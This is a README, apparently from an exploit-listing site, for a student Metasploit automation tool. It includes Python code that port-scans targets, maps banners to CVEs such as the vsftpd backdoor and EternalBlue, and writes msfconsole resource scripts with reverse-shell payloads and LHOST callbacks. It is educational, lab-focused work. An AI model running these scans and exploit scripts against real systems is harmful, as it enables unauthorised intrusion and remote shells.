## https://sploitus.com/exploit?id=DC8CF54B-5E0D-55F4-B5C1-920406A0FF9F
# Penetration Testing with Metasploit

A structured penetration testing automation framework developed by **Aadarsh Bonthula** as part of a cybersecurity portfolio series focused on network security and ethical hacking fundamentals.

Automates the reconnaissance, vulnerability mapping, and reporting phases of a structured pentest. Maps discovered services to known CVEs, generates ready-to-run Metasploit resource scripts, and produces a formal penetration test report.

---

## What It Does

**Phase 1: Reconnaissance**
- TCP connect scan with banner grabbing across the target's port range

**Phase 2: Vulnerability Analysis**
- Cross-references discovered ports and service banners against a built-in CVE database
- Maps findings to specific Metasploit exploit modules

**Phase 3: Metasploit Preparation**
- Auto-generates a `.rc` resource script for each finding
- Scripts are ready to run with `msfconsole -r <script>.rc` in a lab environment

**Phase 4: Report Generation**
- Exports a structured Markdown pentest report
- Includes: open ports, CVE findings, severity ratings, exploitation steps, and remediation recommendations
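Phases 1 and 2 together, as an added stand-alone example written for this page (it is not the project's `pentest.py`): a threaded TCP connect scan that grabs banners, sends one probe to services that stay silent (HTTP waits for the client), and a CVE mapper that marks a finding confirmed only when a version regex matches the banner. A port-only match such as the `Port 139 | Samba` line in the sample output below gives no version, so it is reported as unverified rather than exploitable. The signature table, the `FakeService` loopback stand-in and the sample banners are constructed for the example; the module paths are real Metasploit module names.

```python
"""Added example for this page (not the project's pentest.py): Phase 1 and
Phase 2 in miniature. A threaded TCP connect scan grabs banners; a finding is
confirmed only when a version regex matches the banner, and services that give
no version (SMB/NetBIOS) are reported as unconfirmed port matches."""
import re
import socket
import threading
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor

# Constructed signature table, not the project's CVE database. Module paths are
# real Metasploit module names; the regex is the version gate.
SIGNATURES = [
    (r"vsFTPd 2\.3\.4", "CVE-2011-2523", "vsftpd 2.3.4 backdoor", "CRITICAL",
     "exploit/unix/ftp/vsftpd_234_backdoor"),
    (r"Unreal3\.2\.8\.1", "CVE-2010-2075", "UnrealIRCd 3.2.8.1 backdoor", "CRITICAL",
     "exploit/unix/irc/unreal_ircd_3281_backdoor"),
    (r"Apache/2\.4\.49\b", "CVE-2021-41773", "Apache 2.4.49 path traversal", "CRITICAL",
     "exploit/multi/http/apache_normalize_path_rce"),
]
# Port-only hints for services that never volunteer a version string.
PORT_HINTS = {
    139: ("CVE-2007-2447", "Samba usermap_script", "CRITICAL",
          "exploit/multi/samba/usermap_script"),
    445: ("CVE-2017-0144", "EternalBlue (MS17-010)", "CRITICAL",
          "exploit/windows/smb/ms17_010_eternalblue"),
}
# confirmed is True only when the banner matched a version regex.
Finding = namedtuple("Finding", "port cve title severity module confirmed banner")

def grab_banner(host, port, timeout=1.0):
    """Banner of an open port ("" if silent), None if closed/filtered. FTP, SSH
    and IRC speak first; HTTP waits for the client, so after a silent read
    send one harmless HEAD request and read again."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                data = s.recv(1024)
            except socket.timeout:
                data = b""
            if not data:
                try:
                    s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
                    data = s.recv(1024)
                except OSError:
                    data = b""
    except OSError:
        return None
    return data.decode("latin-1", "replace").strip()

def scan(host, ports, threads=100, timeout=1.0):
    """Phase 1: TCP connect scan; returns {port: banner} for open ports only."""
    with ThreadPoolExecutor(max_workers=threads) as pool:
        results = list(pool.map(lambda p: (p, grab_banner(host, p, timeout)), ports))
    return {p: b for p, b in results if b is not None}

def map_findings(open_ports):
    """Phase 2: version-gated CVE mapping with an explicit confidence flag."""
    findings = []
    for port, banner in sorted(open_ports.items()):
        for rx, cve, title, sev, mod in SIGNATURES:
            if re.search(rx, banner):
                findings.append(Finding(port, cve, title, sev, mod, True, banner))
                break
        else:
            if port in PORT_HINTS:
                cve, title, sev, mod = PORT_HINTS[port]
                findings.append(Finding(port, cve, title, sev, mod, False, banner))
    return findings

class FakeService(threading.Thread):
    """Constructed stand-in for a lab host: serves a fixed banner on a random
    loopback port. banner=b"" simulates a silent HTTP-style service that only
    answers after it receives a request."""
    def __init__(self, banner, http_reply=b""):
        super().__init__(daemon=True)
        self.banner, self.http_reply = banner, http_reply
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(16)
        self.port = self.sock.getsockname()[1]
        self.start()

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            with conn:
                try:
                    if self.banner:
                        conn.sendall(self.banner)
                    else:
                        conn.settimeout(3.0)
                        conn.recv(256)          # wait for the scanner's probe
                        conn.sendall(self.http_reply)
                except OSError:
                    pass

if __name__ == "__main__":
    ftp = FakeService(b"220 (vsFTPd 2.3.4)\r\n")
    web = FakeService(b"", b"HTTP/1.0 200 OK\r\nServer: Apache/2.4.49 (Unix)\r\n\r\n")
    for f in map_findings(scan("127.0.0.1", [ftp.port, web.port])):
        print(f"[{f.severity}] Port {f.port} - {f.cve}: {f.title} -> {f.module}")
```

Running the script scans two loopback services and prints one confirmed finding per port. Against a real lab target, replace the `FakeService` ports with `range(1, 1025)`; the `confirmed` flag is what should decide whether an exploit script is generated at all.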

---

## Concepts Applied

| Concept | Reference |
|---------|-----------|
| TCP Port Scanning & Banner Grabbing | Chapter 4.2, 4.3: Scanning & Enumeration (CodTech Material) |
| Metasploit Framework | Chapter 5.2: Metasploit Framework Basics |
| Exploitation Methodology | Chapter 5 โ€” Gaining Access: Exploitation Techniques |
| Penetration Testing Phases | Chapter 1 โ€” Key phases of ethical hacking |
| Structured Reporting | Chapter 1 โ€” Reporting phase; Chapter 12.3 โ€” Writing Vulnerability Reports |

---

## Requirements

- Python 3.7+
- Python standard library only for scanning and reporting (no third-party packages)
- **Metasploit Framework** (for executing generated `.rc` scripts)
- Authorized lab target (e.g., Metasploitable 2, Kioptrix Level 1)

---

## Project Structure

```
pentest-metasploit/
├── pentest.py              # Main automation script
├── reports/                # Generated reports (auto-created)
│   ├── pentest_report_*.md # Structured pentest report
│   └── msf_scripts/        # Generated Metasploit resource scripts
├── demo/
│   └── sample_report.md    # Example report against Metasploitable 2
└── README.md
```

---

## Usage

```bash
# Basic scan against lab target
python3 pentest.py -t 192.168.1.10

# Custom port range with LHOST for reverse shells
python3 pentest.py -t 192.168.1.10 -p 1-1024 --lhost 192.168.1.5

# Full scan with custom output directory
python3 pentest.py -t 192.168.1.10 -p 1-65535 --threads 200 --output reports/
```

### Arguments

| Flag | Description | Default |
|------|-------------|---------|
| `-t` / `--target` | Target IP or hostname | Required |
| `-p` / `--ports` | Port range to scan | `1-1024` |
| `--lhost` | Your IP (for reverse shell payloads in .rc scripts) | `192.168.1.5` |
| `--threads` | Concurrent scan threads | `100` |
| `--timeout` | Socket timeout per port | `1.0s` |
| `--output` | Report output directory | `reports/` |
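Phases 3 and 4, as an added example written for this page (not the project's code): turning findings into `msfconsole` resource scripts and a Markdown report. It assumes findings in the dict shape of `DEMO_FINDINGS` (constructed to mirror the sample run below) and a small module-to-payload table. Two practitioner details the argument table above does not cover: the `--lhost` default of `192.168.1.5` is only correct on the author's lab network, so `validate_lhost` rejects a non-address or the target itself before it ends up in a reverse payload; and a finding that was matched by port alone gets its `run` line commented out so nothing fires until the version is verified by hand.

```python
"""Added example (not the project's pentest.py): Phase 3 and Phase 4.
Builds msfconsole resource scripts and a Markdown report from findings.
A finding is a dict with the keys shown in DEMO_FINDINGS (constructed data)."""
import ipaddress
import re
from datetime import datetime
from pathlib import Path

# Assumed module-to-payload table for the demo. None means the module's default
# needs no LHOST (the vsftpd backdoor drops into cmd/unix/interact).
MODULE_PAYLOAD = {
    "exploit/unix/ftp/vsftpd_234_backdoor": None,
    "exploit/unix/irc/unreal_ircd_3281_backdoor": "cmd/unix/reverse",
    "exploit/multi/samba/usermap_script": "cmd/unix/reverse",
}

DEMO_FINDINGS = [  # constructed; mirrors the page's sample run
    {"port": 21, "cve": "CVE-2011-2523", "title": "vsftpd 2.3.4 backdoor",
     "severity": "CRITICAL", "module": "exploit/unix/ftp/vsftpd_234_backdoor",
     "confirmed": True, "banner": "220 (vsFTPd 2.3.4)"},
    {"port": 139, "cve": "CVE-2007-2447", "title": "Samba usermap_script",
     "severity": "CRITICAL", "module": "exploit/multi/samba/usermap_script",
     "confirmed": False, "banner": ""},
]

def validate_lhost(lhost, target):
    """Reverse payloads call back to LHOST; a stale default sends the shell to
    the wrong host, and LHOST == target can never work."""
    ip = ipaddress.ip_address(lhost)          # raises ValueError on garbage
    if str(ip) == target:
        raise ValueError("LHOST must be the attacker's address, not the target")
    return str(ip)

def build_rc(finding, target, lhost, index):
    """Return (filename, text) for one msfconsole resource script. Unconfirmed
    findings keep 'run' commented out until the operator verifies the version."""
    name = f"exploit_{index}_{re.sub(r'[^A-Za-z0-9]', '_', finding['cve'])}.rc"
    lines = [
        f"# {finding['cve']}: {finding['title']} on {target}:{finding['port']}",
        f"use {finding['module']}",
        f"set RHOSTS {target}",
        f"set RPORT {finding['port']}",
    ]
    payload = MODULE_PAYLOAD.get(finding["module"])
    if payload:
        lines += [f"set PAYLOAD {payload}", f"set LHOST {lhost}"]
    if finding["confirmed"]:
        lines.append("run")
    else:
        lines.append("# run   <- banner did not confirm the version; verify first")
    return name, "\n".join(lines) + "\n"

def write_scripts(findings, target, lhost, outdir):
    """Phase 3: one .rc file per finding under outdir; returns the paths."""
    outdir = Path(outdir)
    outdir.mkdir(parents=True, exist_ok=True)
    paths = []
    for i, f in enumerate(findings, 1):
        name, text = build_rc(f, target, lhost, i)
        (outdir / name).write_text(text)
        paths.append(outdir / name)
    return paths

def build_report(findings, target, open_ports, when=None):
    """Phase 4: Markdown report. open_ports is {port: banner}."""
    when = when or datetime.now().strftime("%Y-%m-%d %H:%M")
    out = [f"# Penetration Test Report: {target}", f"Generated: {when}", "",
           "## Open Ports", "| Port | Banner |", "|------|--------|"]
    out += [f"| {p} | {b or '(none)'} |" for p, b in sorted(open_ports.items())]
    out += ["", "## Findings", "| Severity | Port | CVE | Title | Status |",
            "|----------|------|-----|-------|--------|"]
    order = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3}
    for f in sorted(findings, key=lambda f: (order.get(f["severity"], 9), f["port"])):
        status = "confirmed by banner" if f["confirmed"] else "UNVERIFIED (port match only)"
        out.append(f"| {f['severity']} | {f['port']} | {f['cve']} | {f['title']} | {status} |")
    return "\n".join(out) + "\n"

if __name__ == "__main__":
    target = "192.168.1.10"
    lhost = validate_lhost("192.168.1.5", target)
    for p in write_scripts(DEMO_FINDINGS, target, lhost, "reports/msf_scripts"):
        print("[MSF] Resource script:", p)
    print(build_report(DEMO_FINDINGS, target, {21: "220 (vsFTPd 2.3.4)", 139: ""}))
```

The generated file names follow the `exploit_N_CVE_YYYY_NNNN.rc` pattern shown in the sample output; each script is plain `msfconsole` commands, so `msfconsole -r reports/msf_scripts/exploit_1_CVE_2011_2523.rc` runs it unchanged.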

---

## Sample Output

```
============================================================
  Penetration Test - Aadarsh Bonthula
  Target  : 192.168.1.10
  Ports   : 1-1024
  LHOST   : 192.168.1.5
  Output  : reports/
  Started : 2025-06-10 16:00:00
============================================================

[Phase 1] Reconnaissance - Port Scan + Banner Grabbing

  [OPEN] 21     | FTP             | 220 (vsFTPd 2.3.4)
  [OPEN] 22     | SSH             | SSH-2.0-OpenSSH_4.7p1
  [OPEN] 139    | NetBIOS         | Samba
  [OPEN] 445    | SMB             | Unknown
  [OPEN] 3306   | MySQL           | MySQL
  [OPEN] 6667   | IRC             | UnrealIRCd 3.2.8.1

  6 open port(s) found.

[Phase 2] Vulnerability Analysis - CVE Mapping

  [CRITICAL] Port 21   - CVE-2011-2523: vsftpd 2.3.4 backdoor
  [CRITICAL] Port 139  - CVE-2007-2447: Samba usermap_script
  [CRITICAL] Port 6667 - CVE-2010-2075: UnrealIRCd backdoor
  [HIGH]     Port 3306 - CVE-2012-2122: MySQL auth bypass

[Phase 3] Metasploit Resource Scripts

  [MSF] Resource script: reports/msf_scripts/exploit_1_CVE_2011_2523.rc
  [MSF] Resource script: reports/msf_scripts/exploit_2_CVE_2007_2447.rc

[Phase 4] Report Generation

[*] Report saved: reports/pentest_report_20250610_1600.md
```

---

## CVE Coverage

The tool includes detection for the following common lab vulnerabilities:

| CVE | Port | Description | Severity |
|-----|------|-------------|----------|
| CVE-2011-2523 | 21 | vsftpd 2.3.4 backdoor | CRITICAL |
| CVE-2017-0144 | 445 | EternalBlue (MS17-010) | CRITICAL |
| CVE-2007-2447 | 139 | Samba usermap_script | CRITICAL |
| CVE-2010-2075 | 6667 | UnrealIRCd backdoor | CRITICAL |
| CVE-2021-41773 | 80 | Apache 2.4.49 path traversal | CRITICAL |
| CVE-2008-0166 | 22 | OpenSSH weak Debian keys | HIGH |
| CVE-2012-2122 | 3306 | MySQL auth bypass | HIGH |
| CVE-2007-3278 | 5432 | PostgreSQL default creds | HIGH |
| CVE-2009-3843 | 8180 | Tomcat manager WAR upload | HIGH |

---

## Legal Disclaimer

This tool is developed for **educational purposes and authorized penetration testing only**. Only test systems you own or have explicit written permission to assess. All exploitation must be conducted in isolated lab environments (e.g., Metasploitable 2, Kioptrix). Unauthorized use is illegal and unethical.

---

## Author

**Aadarsh Bonthula**
B.Tech Computer Science (Cybersecurity Specialization)
Manav Rachna International Institute of Research and Studies

GitHub: [NovocaineX](https://github.com/NovocaineX)

*Developed as part of a cybersecurity portfolio series focused on network security and ethical hacking fundamentals.*